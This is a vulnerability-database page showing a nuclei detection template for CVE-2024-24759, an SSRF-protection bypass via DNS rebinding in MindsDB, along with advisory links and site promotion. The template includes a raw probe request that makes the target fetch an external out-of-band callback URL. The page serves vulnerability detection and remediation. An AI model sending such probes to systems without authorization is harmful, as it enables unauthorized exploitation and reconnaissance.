Lucene search
+L

MindsDB -DNS Rebinding SSRF Protection Bypass

🗓️ 21 Aug 2026 02:28:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 64 Views

Identifies MindsDB's DNS rebinding vulnerability allowing SSRF protection bypass. Upgrade needed.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2024-24759
5 Sep 202409:40
circl
cnnvd
CNNVD
MindsDB 安全漏洞
5 Sep 202400:00
cnnvd
cve
CVE
CVE-2024-24759
5 Sep 202416:30
cve
cvelist
Cvelist
CVE-2024-24759 MindsDB Vulnerable to Bypass of SSRF Protection with DNS Rebinding
5 Sep 202416:30
cvelist
github
Github Security Blog
MindsDB Vulnerable to Bypass of SSRF Protection with DNS Rebinding
5 Sep 202416:37
github
nvd
NVD
CVE-2024-24759
5 Sep 202417:15
nvd
osv
OSV
GHSA-4JCV-VP96-94XR MindsDB Vulnerable to Bypass of SSRF Protection with DNS Rebinding
5 Sep 202416:37
osv
osv
OSV
PYSEC-2024-74
5 Sep 202417:15
osv
ptsecurity
Positive Technologies
PT-2024-20536 · Mindsdb · Mindsdb
5 Sep 202400:00
ptsecurity
pypa
PyPA
PYSEC-2024-74
5 Sep 202417:15
pypa
Rows per page
id: CVE-2024-24759

info:
  name: MindsDB -DNS Rebinding SSRF Protection Bypass
  author: Lee Changhyun(eeche)
  severity: high
  description: |
    Detects DNS rebinding vulnerability that allows bypass of SSRF protection. The vulnerability exists in the URL validation mechanism where DNS resolution is performed without considering DNS rebinding attacks.
  impact: |
    SSRF Protection Bypass via DNS Rebinding
  remediation: |
    Upgrade to mindsdb version 23.12.4.2 or later
  reference:
    - https://github.com/advisories/GHSA-4jcv-vp96-94xr
    - https://nvd.nist.gov/vuln/detail/CVE-2024-24759
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-24759
    cwe-id: CWE-918
    epss-score: 0.04936
    epss-percentile: 0.91464
    cpe: cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mindsdb
    product: mindsdb
    shodan-query: title:"mindsdb"
  tags: cve,cve2024,mindsdb,ssrf,dns-rebinding,oast,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "mindsdb")'
        internal: true

  - raw:
      - |
        GET /check_private_url?url=https://{{interactsh-url}}/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a00473045022028ff2383ec4060c7705e019d97e7a3511f01025603e0d6f4b991f4d1d1c4b3aa022100b20478f29d77a52505d7d4a76d713e48609120fdc498079ce95d406049a97e36:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.19.1 - 9.3
EPSS0.04936
SSVC
64